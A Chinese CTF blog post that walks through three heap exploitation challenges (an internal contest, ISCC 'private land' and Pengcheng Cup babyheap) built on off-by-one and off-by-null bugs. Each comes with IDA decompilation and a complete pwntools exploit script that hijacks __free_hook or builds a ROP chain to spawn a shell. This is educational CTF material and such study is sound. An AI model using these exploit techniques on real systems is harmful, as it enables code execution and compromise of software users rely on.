off by one

已于 2023-11-20 11:10:17 修改
阅读量80 收藏
点赞数
文章标签: 安全
于 2023-11-16 23:15:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zkaqlaoniao/article/details/134446177
版权

目录

背景知识

内部赛

ida

思路

详细流程

exp

ISCC线下赛-私地

ida

题目特点

详细流程

exp

鹏城杯-babyheap

ida

详细流程

exp

背景知识

off-by-one漏洞顾名思义,就是我们在向缓冲区写入数据的时候由于限制条件或边界验证的不严格,导致多写入一个字节导致缓冲区溢出一个字节。我们在CTF中常见的溢出方式有:
1、在遇到用strcpy函数将某个变量或常量的值写入堆内时,复制遇到结束符\x00停止,并且在复制结束的时候在结尾写入一个\x00。那么在读入的数据和堆快的最大存储内容大小相等的时候,就会向外溢出一个字节的“\x00”,从而形成off-by-one。
2、在向堆内循环写入的时候,没有控制好循环次数而导致多写入一字节的内容,导致off-by-one
3、在CTF中出题人故意写出的off-by-one漏洞。比如:size+1<=max_content_size

内部赛

2.31的off by null,无uaf,限制了申请的大小在0x100,所以需要合理布局

ida

int user_add()
{
  unsigned int size; // [rsp+8h] [rbp-48h]
  unsigned int size_4; // [rsp+Ch] [rbp-44h]
  char buf[32]; // [rsp+10h] [rbp-40h] BYREF
  char nptr[24]; // [rsp+30h] [rbp-20h] BYREF
  unsigned __int64 v5; // [rsp+48h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  puts("iput note size:");
  read(0, buf, 0x10uLL);
  size = atoi(buf);
  if ( !size )
    return 0;
  if ( size > 0x100 )
    return 0;
  puts("Which one?");
  read(0, nptr, 0x10uLL);
  size_4 = atoi(nptr);
  if ( size_4 > 0xF )
    return 0;
  if ( *((_QWORD *)&heap_ptr + size_4) )
    return puts("not empty!");
  *((_QWORD *)&heap_ptr + size_4) = malloc(size);
  heap_size[size_4] = size;
  puts("content:");
  read(0, *((void **)&heap_ptr + size_4), size);
  return puts("malloc OK!");
}
int user_edit()
{
  unsigned int v1; // [rsp+Ch] [rbp-24h]
  char buf[24]; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 v3; // [rsp+28h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  puts("which one?");
  read(0, buf, 0x10uLL);
  v1 = atoi(buf);
  if ( v1 > 0xF )
    return 0;
  if ( !heap_ptr[v1] )
    return puts("empty!");
  puts("content:");
  edit_read(heap_ptr[v1], (unsigned int)heap_size[v1]);
  return puts("edit OK!");
}
__int64 __fastcall edit_read(_BYTE *a1, int a2)
{
  int v2; // eax
  unsigned int v6; // [rsp+18h] [rbp-8h]

  while ( 1 )
  {
    v2 = a2--;
    if ( v2 < 0 )
      break;
    v6 = read(0, a1, 1uLL);
    if ( !v6 )
      break;
    if ( v6 == -1 )
    {
      if ( __errno_location() != 11 && __errno_location() != 4 )
        return 0xFFFFFFFFLL;
    }
    else
    {
      if ( *a1 == 10 )
      {
        *a1 = 0;
        return v6;
      }
      ++a1;
    }
  }
  return v6;
}

思路

利用off by null在unsorted bin中实现chunk的合并,然后去修改fd指针,打system('/bin/sh')

详细流程

先在tcachebins 中泄露堆地址

add(0,0xf8,'aaaa')
add(1,0xf8,'aaaa')
delete(1)
delete(0)

add(1,0xf8,'')
show(1)
r(9)
heap_base=u64(p.recv(6).ljust(8,'\x00'))-0x30a
leak('heap_base ',heap_base)


然后重置一下idx,然后布置一下chunk(填满tcachebins,然后留出两个chunk用来合并,最后free 的chunk用来泄露libc)

delete(1)
for i in range(11):
    add(i,0xf8,'')

for i in range(7):
    delete(i)

delete(9)
 


 泄露一下libc然后,把chunk链入small bin中
 

add(11,0x10,'')

show(11)
r(9)
libc_base=u64(p.recv(6).ljust(8,'\x00'))-0x1ecc0a
leak('libc_base ',libc_base)

free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system'] 

delete(11)
add(12,0xe0,'')
 

 


 然后在下面那个位置伪造chunk来进行合并
 

 

pl=p64(0)+p64(0xf1)+p64(heap_base+0x9a0)+p64(heap_base+0x9a0)
pl=pl.ljust(0xf0,'\x00')
pl+=p64(0xf0)
edit(7,pl)

 

 


 这里大小为0x100=就是为了方便覆盖:这里是伪造的chunk,fd和bk都为伪造chunk的chunk头,然后伪造了next_chunk_pre_size,然后利用了off by null置空inuse,这里因为把'\n'变成了'\x00',所以这里最后只会保留倒数第三位,所以才要求chunk大小为0x100或者0x200或者0x300
 

delete(8)

 

 


 可以看到unsortedbin中已经合并了
 这时候chunk7还保留了chunk指针,然后我们在合并的unsorted bin 中申请chunk,这时候chunk7和申请的chunk有重叠的部分,我们就可以去修改chunk7来改fd了
 

for i in range(7):
    add(i,0xf8,'')

add(9,0xf8,'')

delete(1)
delete(9)

pl = p64(0)+p64(0x100)+p64(free_hook)

edit(7,pl)
 

 

add(1,0xf8,'/bin/sh\x00')
add(9,0xf8,p64(system))

sla('>> ',str(2))
sla('which note do you want delete?\n',str(1))
 

 

exp
 

import os
import sys
import time
from pwn import *
from ctypes import *

context.os = 'linux'
context.log_level = "debug"

s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda num                :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
l64     = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
l32     = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,b"\x00"))
context.terminal = ['gnome-terminal','-x','sh','-c']

x64_32 = 1

if x64_32:
    context.arch = 'amd64'
else:
    context.arch = 'i386'

p=process('./pwn')
elf = ELF('./pwn')
libc=ELF('./libc-2.31.so')

add_idx = 1
delete_idx = 2
show_idx = 3
edit_idx = 4

def duan():
    gdb.attach(p)
    pause()

def choice(cho):
    sla('>> ',cho)

def add(idx,size,content):
    choice(add_idx)
    sla('iput note size:\n',size)
    sla('Which one?\n',idx)
    sla('content:\n',content)

def delete(idx):
    choice(delete_idx)
    sla('which note do you want delete?\n',idx)

def show(idx):
    choice(show_idx)
    sla('which one?\n',idx)

def edit(idx,content):
    choice(edit_idx)
    sla('which one?\n',idx)
    sla('content:\n',content)


add(0,0xf8,'aaaa')
add(1,0xf8,'aaaa')
delete(1)
delete(0)

add(1,0xf8,'')
show(1)

r(9)
heap_base=u64(p.recv(6).ljust(8,'\x00'))-0x30a
leak('heap_base ',heap_base)
delete(1)


for i in range(11):
    add(i,0xf8,'')

for i in range(7):
    delete(i)

delete(9)
add(11,0x10,'')

show(11)
r(9)
libc_base=u64(p.recv(6).ljust(8,'\x00'))-0x1ecc0a
leak('libc_base ',libc_base)

free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system'] 

delete(11)
add(12,0xe0,'')


pl=p64(0)+p64(0xf1)+p64(heap_base+0x9a0)+p64(heap_base+0x9a0)
pl=pl.ljust(0xf0,'\x00')
pl+=p64(0xf0)
edit(7,pl)
delete(8)

for i in range(7):
    add(i,0xf8,'')

add(9,0xf8,'')
delete(1)
delete(9)

pl = p64(0)+p64(0x100)+p64(free_hook)
edit(7,pl)
add(1,0xf8,'/bin/sh\x00')
add(9,0xf8,p64(system))

sla('>> ',str(2))
sla('which note do you want delete?\n',str(1))
itr()
 

ISCC线下赛-私地
 

glibc2.23 : off by one + chunk Overlapping
 off by one 向下合并:size and prev size inuse
 合并只需要改chunk一步就能成功,然后free后就能释放,释放后再次申请就有重叠的chunk了
 

ida
 

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[4]; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v5; // [rsp+8h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 2, 0LL);
  while ( 1 )
  {
    menu();
    read(0, buf, 4uLL);
    switch ( atoi(buf) )
    {
      case 1:
        create_user();
        break;
      case 2:
        edit_user();
        break;
      case 3:
        show_user();
        break;
      case 4:
        delete_user();
        break;
      case 5:
        exit(0);
      default:
        puts("Invalid Choice");
        break;
    }
  }
}
unsigned __int64 create_user()
{
  __int64 v0; // rbx
  int i; // [rsp+4h] [rbp-2Ch]
  size_t size; // [rsp+8h] [rbp-28h]
  char buf[8]; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 v5; // [rsp+18h] [rbp-18h]

  v5 = __readfsqword(0x28u);
  for ( i = 0; i <= 9; ++i )
  {
    if ( !*(&heaparray + i) )
    {
      *(&heaparray + i) = malloc(0x10uLL);
      if ( !*(&heaparray + i) )
      {
        puts("Allocate Error");
        exit(1);
      }
      printf("enter the user ID : ");
      read(0, buf, 8uLL);
      size = atoi(buf);
      v0 = *(&heaparray + i);
      *(v0 + 8) = malloc(size);
      if ( !*(*(&heaparray + i) + 8LL) )
      {
        puts("Allocate Error");
        exit(2);
      }
      **(&heaparray + i) = size;
      printf("enter the username : ");
      read_input(*(*(&heaparray + i) + 8LL), size);
      puts("SuccessFul");
      return __readfsqword(0x28u) ^ v5;
    }
  }
  return __readfsqword(0x28u) ^ v5;
}
unsigned __int64 edit_user()
{
  int v1; // [rsp+0h] [rbp-10h]
  char buf[4]; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v3; // [rsp+8h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("Index :");
  read(0, buf, 4uLL);
  v1 = atoi(buf);
  if ( v1 >= 0xA )
  {
    puts("Out of bound!");
    _exit(0);
  }
  if ( *(&heaparray + v1) )
  {
    printf("enter the username : ");
    read_input(*(*(&heaparray + v1) + 8LL), **(&heaparray + v1) + 1LL);
      //off by one
    puts("Done !");
  }
  else
  {
    puts("No this user !");
  }
  return __readfsqword(0x28u) ^ v3;
}
 

申请chunk前会先申请0x10的chunk,然后是按照修改地址也是从0x10chunk里面寻址的
 

题目特点
 

 


 这样利用off by one 先去重叠chunk,然后我们再去修改0x10chunk中地址为free_hook,然后修改为system就可以
 

详细流程
 

首先找个地址写个/bin/sh\x00
 

add(0x10,'/bin/sh\x00')
 

 


 然后利用unsorted bin把libc_base泄露出来
 

add(0x88,'aaaa')
add(0x18,'aaaa')
delete(1)
add(0x88,'a'*8)
show(1)
ru('aaaaaaaa')
libc_base = u64(p.recv(6).ljust(8,'\x00'))-0x3c4b0a
leak('libc_base ',libc_base)
system = libc_base + libc.sym['system'] 
free_hook = libc_base + libc.sym['__free_hook']
malloc_hook = libc_base + libc.sym['__malloc_hook']
bin_sh = libc_base + next(libc.search(b'/bin/sh'))
 

 


 然后直接利用off by one 修改size,然后把这个chunk free掉
 

add(0x18,'')
add(0x18,'')
add(0x18,'')
add(0x18,'')

edit(2,p64(0)*3+p8(0x81))
delete(3)

 

 

add(0x70,p64(0)*8+p64(0x10)+p64(free_hook))

 

利用chunk Overlapping然后将修改地址的索引改成free_hook,这样就可以直接改hook了
 

 

edit(4,p64(system))
delete(0)

 

直接将free_hook改成system,然后free(0)就可以
 

 

exp
 

import os
import sys
import time
from pwn import *
from ctypes import *

context.os = 'linux'
context.log_level = "debug"

s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda num                :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
l64     = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
l32     = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,b"\x00"))
context.terminal = ['gnome-terminal','-x','sh','-c']

x64_32 = 1

if x64_32:
    context.arch = 'amd64'
else:
    context.arch = 'i386'

p=process('./pwn')
elf = ELF('./pwn')
libc=ELF('./libc.so.6')


add_idx = 1
delete_idx = 4
show_idx = 3
edit_idx = 2

def duan():
    gdb.attach(p)
    pause()

def choice(cho):
    sla('',cho)

def add(size,content):
    choice(add_idx)
    #sla('',idx)
    sla('enter the user ID : ',size)
    sla('enter the username : ',content)

def delete(idx):
    choice(delete_idx)
    sla('Index :',idx)

def show(idx):
    choice(show_idx)
    sla('Index :',idx)

def edit(idx,content):
    choice(edit_idx)
    sla('Index :',idx)
    #sla('',size)
    sa('enter the username : ',content)

add(0x10,'/bin/sh\x00')
add(0x88,'aaaa')
add(0x18,'aaaa')
delete(1)

add(0x88,'a'*8)
show(1)
ru('aaaaaaaa')
libc_base = u64(p.recv(6).ljust(8,'\x00'))-0x3c4b0a
leak('libc_base ',libc_base)


system = libc_base + libc.sym['system'] 
free_hook = libc_base + libc.sym['__free_hook']
malloc_hook = libc_base + libc.sym['__malloc_hook']
bin_sh = libc_base + next(libc.search(b'/bin/sh'))
add(0x18,'')
add(0x18,'')
add(0x18,'')
add(0x18,'')
edit(2,p64(0)*3+p8(0x81))
delete(3)
add(0x70,p64(0)*8+p64(0x10)+p64(free_hook))
edit(4,p64(system))
delete(0)
'''
'''
#duan()
itr()
 

鹏城杯-babyheap
 

glibc2.38 : off by null + IO_leak + attack tcache_struct + 高版本打栈
 

ida
 

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  IO();
  heap_addr();
  while ( 1 )
  {
    menu();
    switch ( (unsigned int)sub_136B() )
    {
      case 1u:
        add();
        break;
      case 2u:
        edit();
        break;
      case 3u:
        show();
        break;
      case 4u:
        delete();
        break;
      case 5u:
        return 0LL;
      default:
        puts("invalid choice");
        break;
    }
  }
}
__int64 add()
{
  int i; // [rsp+0h] [rbp-10h]
  int v2; // [rsp+4h] [rbp-Ch]

  for ( i = 0; i <= 15 && qword_4060[i]; ++i )
    ;
  if ( i == 16 )
  {
    puts("list full\n");
    return 0LL;
  }
  else
  {
    puts("input your name size");
    v2 = sub_136B();
    if ( v2 > 1023 && v2 <= 1280 )
    {
      qword_4060[i] = malloc(v2);
      dword_40E0[i] = v2;
      puts("input your name");
      read_libc(qword_4060[i], v2);
      return 0LL;
    }
    else
    {
      puts("invalid size");
      return 0LL;
    }
  }
}
unsigned __int64 __fastcall sub_13BE(__int64 a1, int a2)
{
  char buf; // [rsp+13h] [rbp-Dh] BYREF
  int i; // [rsp+14h] [rbp-Ch]
  unsigned __int64 v5; // [rsp+18h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  for ( i = 0; i < a2; ++i )
  {
    read(0, &buf, 1uLL);
    if ( buf == 10 )
      break;
    *(a1 + i) = buf;   
  }
  *(i + a1) = 0;  //off by null
  return v5 - __readfsqword(0x28u);
}
 

详细流程
 

先泄露堆地址
 

glibc2.38 : off by null + IO_leak + attack tcache_struct + 高版本打栈

ida
__int64 __fastcall main(int a1, char **a2, char **a3)
{
  IO();
  heap_addr();
  while ( 1 )
  {
    menu();
    switch ( (unsigned int)sub_136B() )
    {
      case 1u:
        add();
        break;
      case 2u:
        edit();
        break;
      case 3u:
        show();
        break;
      case 4u:
        delete();
        break;
      case 5u:
        return 0LL;
      default:
        puts("invalid choice");
        break;
    }
  }
}
__int64 add()
{
  int i; // [rsp+0h] [rbp-10h]
  int v2; // [rsp+4h] [rbp-Ch]

  for ( i = 0; i <= 15 && qword_4060[i]; ++i )
    ;
  if ( i == 16 )
  {
    puts("list full\n");
    return 0LL;
  }
  else
  {
    puts("input your name size");
    v2 = sub_136B();
    if ( v2 > 1023 && v2 <= 1280 )
    {
      qword_4060[i] = malloc(v2);
      dword_40E0[i] = v2;
      puts("input your name");
      read_libc(qword_4060[i], v2);
      return 0LL;
    }
    else
    {
      puts("invalid size");
      return 0LL;
    }
  }
}
unsigned __int64 __fastcall sub_13BE(__int64 a1, int a2)
{
  char buf; // [rsp+13h] [rbp-Dh] BYREF
  int i; // [rsp+14h] [rbp-Ch]
  unsigned __int64 v5; // [rsp+18h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  for ( i = 0; i < a2; ++i )
  {
    read(0, &buf, 1uLL);
    if ( buf == 10 )
      break;
    *(a1 + i) = buf;   
  }
  *(i + a1) = 0;  //off by null
  return v5 - __readfsqword(0x28u);
}
 

 


 chunk0从fd位置开始伪装,然后后续chunk1和chunk2
 

add(0x418,p64(0)+p64(0x1880)+p64(heap_base+0x2c0)+p64(heap_base+0x2c0)) #idx0
add(0x408,'aaaa')
add(0x408,'aaaa')
add(0x408,'aaaa')
add(0x418,'aaaa')
add(0x418,'aaaa') #idx5
add(0x4f8,'bbbb')
add(0x4f8,'bbbb')
 

 


 用 off by null 改inuse,伪装chunk
 

edit(5,0x418,'a'*0x410+p64(0x1880))
 

 


 然后直接free
 

delete(6)
 

 

然后直接申请一定0x408大小的chunk,造成两个指针指向同一个chunk
 

add(0x408,'cccc')
add(0x488,'cccc')
add(0x488,'cccc')
 

 


 然后把这个相同fd的chunk链入large bin,泄露libc
 

delete(8)
add(0x498,'dddd')
show(1)
libc_base=u64(p.recv(6).ljust(8,'\x00'))-0x1ff0f0-0x20
 

 

delete(2)
delete(3)

 

 


 然后找个比较进的地址去改fd
 

 

pl='a'*0x380+p64(0)+p64(0x411)+p64((heap_base+0x10)^(heap_base>>12))
edit(9,0x400,pl)

 

 


 然后利用attack tcache_struct和IO_leak泄露栈地址
 

sl('')
add(0x408,'aaaa')
pl=p64(0x1)+p64(0)*14+p64(0x0007000000000000)+p64(0)*0x3f+p64(stdout)
add(0x408,pl)

ru('\n')
stack=u64(p.recvuntil('\x7f').ljust(8,'\x00'))-0x120
leak('stack ',stack)
 

 

 

 


 再利用一次tcache_struct attack
 

pl=p64(0x1)+p64(0)*14+p64(0x0007000000000000)+p64(0)*0x3f+p64(stack-0x8)
edit(3,0x408,pl)
 

 


 然后直接再利用
 

pop_rdi = libc_base + 0x0000000000028715
bin_sh = libc_base + next(libc.search(b'/bin/sh'))
system = libc_base + libc.sym['system']
ret  = libc_base + 0x0000000000026a3e
sl('1')

pl= p64(0)+ p64(ret) + p64(pop_rdi) + p64(bin_sh) + p64(system)
add(0x400,pl)
 

在add函数的rbp后面构造rop
 

 


 然后正常退出就能getshell
 

menu(5)

 

 

exp
 

import os
import sys
import time
from pwn import *
from ctypes import *

context.os = 'linux'
context.log_level = "debug"

s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda num                :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
l64     = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
l32     = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,b"\x00"))
context.terminal = ['gnome-terminal','-x','sh','-c']

x64_32 = 1

if x64_32:
    context.arch = 'amd64'
else:
    context.arch = 'i386'

p=process('./pwn')
elf = ELF('./pwn')
libc=ELF('./libc.so.6')

def duan():
    gdb.attach(p)
    pause()

def menu(opt):
    sla('>>',str(opt))

def add(size,data):
    menu(1)
    sla(b"input your name size",str(size))
    sla(b"input your name",data)

def delete(index):
    menu(4)
    sla(b'input index\n',str(index))

def show(index):
    menu(3)
    sla(b'input index\n',str(index))

def edit(index,size,name):
    menu(2)
    sla(b'input index',str(index))
    sla(b'input your name size',str(size))
    sa(b'input your name',name)

ru('and this line will make the game easier\n')

heap_base=int(r(14),16)-0x2a0
leak('heap_base ',heap_base)

add(0x418,p64(0)+p64(0x1880)+p64(heap_base+0x2c0)+p64(heap_base+0x2c0))
add(0x408,'aaaa')
add(0x408,'aaaa')
add(0x408,'aaaa')
add(0x418,'aaaa')
add(0x418,'aaaa')
add(0x4f8,'bbbb')
add(0x4f8,'bbbb')

edit(5,0x418,'a'*0x410+p64(0x1880))
delete(6)

add(0x408,'cccc')
add(0x488,'cccc')
add(0x488,'cccc')
delete(8)
add(0x498,'dddd')
show(1)
libc_base=u64(p.recv(6).ljust(8,'\x00'))-0x1ff0f0-0x20

leak('libc_base ',libc_base)

stdout = libc_base + libc.sym['_IO_2_1_stdout_']
environ = libc_base + libc.sym['_environ']

delete(2)
delete(3)

pl='a'*0x380+p64(0)+p64(0x411)+p64((heap_base+0x10)^(heap_base>>12))
edit(9,0x400,pl)
sl('')
add(0x408,'aaaa')
pl=p64(0x1)+p64(0)*14+p64(0x0007000000000000)+p64(0)*0x3f+p64(stdout)
add(0x408,pl)

pl=p64(0xfbad1800) + p64(0)*3 + p64(environ) + p64(environ+8)*4
add(0x408,pl)

ru('\n')
stack=u64(p.recvuntil('\x7f').ljust(8,'\x00'))-0x120
leak('stack ',stack)

pl=p64(0x1)+p64(0)*14+p64(0x0007000000000000)+p64(0)*0x3f+p64(stack-0x8)
edit(3,0x408,pl)

pop_rdi = libc_base + 0x0000000000028715
bin_sh = libc_base + next(libc.search(b'/bin/sh'))
system = libc_base + libc.sym['system']
ret  = libc_base + 0x0000000000026a3e
sl('1')

pl= p64(0)+ p64(ret) + p64(pop_rdi) + p64(bin_sh) + p64(system)
add(0x400,pl)

menu(5)

itr()
 

 

 
 
 
  
免费领取安全学习资料包!
 
 
 


                

        

        

    

  


    

      

        

            

              
                
                  渗透测试老鸟-九青
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
off-by-one漏洞的利用

				
			

			

				

					weixin_44864859的博客
				

				

					07-21
					
					1512
					
				

			

		

		

			
				
介绍

严格来说 off-by-one 漏洞是一种特殊的溢出漏洞,off-by-one 指程序向缓冲区中写入时,写入的字节数超过了这个缓冲区本身所申请的字节数并且只越界了一个字节。

漏洞原理

off-by-one 是指单字节缓冲区溢出,这种漏洞的产生往往与边界验证不严和字符串操作有关,当然也不排除写入的 size 正好就只多了一个字节的情况。其中边界验证不严通常包括

使用循环语句向堆块中写入数据时,循环的次数设置错误(这在 C 语言初学者中很常见)导致多写入了一个字节。
字符串操作不合适

一般来说,

			
		

	



                

            
              



	

		

			

				
					
堆溢出 Off-By-One 原理学习

				
			

			

				

					prettyX的博客
				

				

					04-11
					
					2297
					
				

			

		

		

			
				
Off-By-One

严格来说,off-by-one是一种特殊的溢出漏洞,off-by-one指程序向缓冲区中写入时,写入的字节数超过了这个缓冲区本身所申请的字节数并且只越界了一个字节。
	off-by-one,是指单字节缓冲区溢出,这种漏洞的产生往往与边界验证不严和字符串操作有关,也不排除写入的size正好就只多了一个字节的情况。
	一般认为,单字节溢出是难以利用的,但是因为Linux的堆管理机制ptmalloc验证的松散性,基于Linux堆的off-by-one漏洞利用起来并不复杂,并且威力强大...

			
		

	



              


  
              

                


	

		

			

				
					
off-by-one(大小差一)错误介绍

				
			

			

				

					流浪天空
				

				

					03-09
					
					8118
					
				

			

		

		

			
				
详细了解请移步这里 off-by-one,大小差一错误是一类常见的程序设计错误。这方面有一个经典的例子OpenSSH.去Google搜索关键词“OpenSSH
 off-by-one”可以了解相关状况。具体来说,
1. if(id  channels_alloc)...
2. if(id = channels_alloc)...
第二句应该是正确的写法。举个更通俗的例子:
int a[5]

			
		

	





	

		

			

				
					
off-by-one error

				
			

			

				

					blrk
				

				

					05-07
					
					3622
					
				

			

		

		

			
				
大小差一。。
就是指某个变量的最大值和最小值可能会和正常值差1,或者循环多执行一次/少执行一次。
一般在临界情况时发生。
 
off-by-one,大小差一错误是一类常见的程序设计错误。这方面有一个经典的例子OpenSSH.去Google搜索关键词“OpenSSH off-by-one”可以了解相关状况。具体来说,

1. if(id  channels_alloc)...
2. i

			
		

	



		

			
		



	

		

			

				
					
Off-By-One

				
			

			

				

					abelxu
				

				

					11-09
					
					1429
					
				

			

		

		

			
				
0x01 原理
严格来说 off-by-one 漏洞是一种特殊的溢出漏洞,off-by-one 指程序向缓冲区中写入时,写入的字节数超过了这个缓冲区本身所申请的字节数并且只越界了一个字节。off-by-one的产生往往和字符串操作有关。如strlen计算长度时,不会计算最后的“0字节”(\x00)。循环读入时,<写成了<=。
0x02 利用思路
溢出字节为可控制任意字节:
通过修改下一个堆块的size造成块结构之间出现重叠,从而泄露其他块数据,或是覆盖其他块数据。也可使用 NULL 字节溢出的方

			
		

	





	

		

			

				
					
Off-by-One Error: 编码中的常见陷阱 ⚠️

					
热门推荐

				
			

			

				

					沉淀、分享、成长,让自己和他人都能有所收获! 
				

				

					08-02
					
					3万+
					
				

			

		

		

			
				
大家好,我是默语,擅长全栈开发、运维和人工智能技术。在这篇博客中,我将深入探讨编码中的常见陷阱之一:Off-by-One 错误(OBOE)。Off-by-One 错误是在循环和数组处理时经常出现的错误,可能会导致程序崩溃或数据错误。本文将详细介绍这种错误的成因、如何识别、预防和修复的方法。希望通过这篇文章,大家能够提高代码的健壮性,避免常见的编程陷阱。Off-by-One 错误(OBOE)是指在循环或数组操作中,由于边界条件设置错误,导致多执行或少执行一次操作。这种错误通常发生在for循环或while。

			
		

	





	

		

			

				
					
好好说话之off-by-one

				
			

			

				

					hollk’s blog
				

				

					08-24
					
					6034
					
				

			

		

		

			
				
从这篇开始就进入堆的范围了,又是两万字”小论文“,关于堆的相关知识请参考wiki上的章节。博主直接讲做堆的技巧,这篇讲off-by-one,也是踩了很多的坑。这篇文章因为写的比较详细,所以会很长,如果有忘记的知识点请翻阅目录查看。感谢在学习中帮助过我的大佬们:NoOne、povcfe

			
		

	





	

		

			

				
					
off-by-one

				
			

			

				

					钞sir的博客
				

				

					11-05
					
					9827
					
				

			

		

		

			
				
简介
off-by-one漏洞在堆分配时有比较大的威胁, 在pwn中利用比较常见, 这里介绍一个由base64解码造成的off-by-one漏洞, 这个漏洞在CVE-2018-6789当中是真实存在的, 这里以一个ctf中的pwn题目notepad来介绍一下利用过程;
前置知识
原理在分析程序之前先介绍一下Base64的编码和解码的原理;
Base64编码
Base64编码的原理是将二进制数据进行分组,每24Bit(即3字节)为一个大组,再把一个大组的数据分成4个6Bit的小分组;
因为6bit数据只能表示

			
		

	





	

		

			

				
					
攻防世界PWN之Babyheap(null off by one)题解

				
			

			

				

					seaaseesa的博客
				

				

					11-20
					
					2237
					
				

			

		

		

			
				
Babyheap(null off by one)

本题用到的知识

malloc_hook、realloc_hook、fastbin attack、unsorted bin合并

首先,检查一下程序的保护机制,保护全开



然后用IDA分析,发现在创建并读入数据时,有一个null off by one漏洞



我们所能利用的也就是这个漏洞

第一步仍然是想办法泄露一些关键地址

由于可以溢...

			
		

	





	

		

			

				
					
基于Linux的off by one漏洞

				
			

			

				

					you_need_me的博客
				

				

					06-09
					
					758
					
				

			

		

		

			
				
https://blog.csdn.net/nibiru_holmes/article/details/62040763

			
		

	





	

		

			

				
					
V-by-One-HS Standard,Version 1.4,December 15, 2011.pdf

				
			

			

				

					07-26
				

			

		

		

			
				
V-by-One®HS标准版本1.4是一个高速视频信号数据传输协议,由THine Electronics, Inc.于2011年12月15日发布。此标准旨在简化内部连接的使用,并降低与现有设备连接方式相比的功耗,实现高效的数据传输。以下是对文档...

			
		

	





	

		

			

				
					
【pwn学习】堆溢出(四)- off-by-one 漏洞

				
			

			

				

					Morphy_Amo的博客
				

				

					02-16
					
					1131
					
				

			

		

		

			
				
off-by-one 漏洞

前置学习

【pwn学习】堆溢出(一)
【pwn学习】堆溢出(二)- First Fit
【pwn学习】堆溢出(三)- Unlink和UAF


off-by-one是一种特殊的溢出漏洞,指只溢出一个字节的情况。
造成原因
造成off-by-one的原因常常是因为边界验证不充分。


循环写入时,循环次数设置错误导致多写入了一个字节;


字符串操作有误;
strlen 是我们很熟悉的计算 ascii 字符串长度的函数,这个函数在计算字符串长度时是不把结束符 '\x00' 计算

			
		

	





	

		

			

				
					
基于 SM3 的密钥派生函数 (KDF):国密合规的安全密钥生成方案

				
			

			

				

					A_Lonely_Smile的博客
				

				

					10-29
					
					995
					
				

			

		

		

			
				
在现代加密技术中,密钥派生函数(Key Derivation Function, KDF)是一个将初始输入(如密码、共享密钥等)转换为安全密钥的过程,用于实现加密、消息认证等密码操作。特别是在符合国密标准的场景中,基于 SM3 的 KDF 已成为一种常用的密钥生成方式。本文将详细讲解 SM3-KDF 的工作原理,逐步介绍其实现过程,并提供 Java 代码示例,帮助您理解如何在项目中应用 SM3-KDF。

			
		

	





	

		

			

				
					
冷钱包与热钱包的差异 | 加密货币存储的安全方案

					
最新发布

				
			

			

				

					tusik68的博客
				

				

					11-01
					
					1192
					
				

			

		

		

			
				
想要安全存储加密货币?了解冷钱包和热钱包的核心差异,找到适合的存储方式,确保您的数字资产安全无忧。

			
		

	





	

		

			

				
					
前端如何安全存储密钥,防止信息泄露

				
			

			

				

					AM1n98的博客
				

				

					10-30
					
					1237
					
				

			

		

		

			
				
把公钥写在前端代码文件里被公司检测到了要整改,整理几种常见的前端密钥存储方案。

			
		

	





	

		

			

				
					
轻型民用无人驾驶航空器安全操控理论培训知识总结-多旋翼部分

				
			

			

				

					Lizzy_Fly的博客
				

				

					10-30
					
					898
					
				

			

		

		

			
				
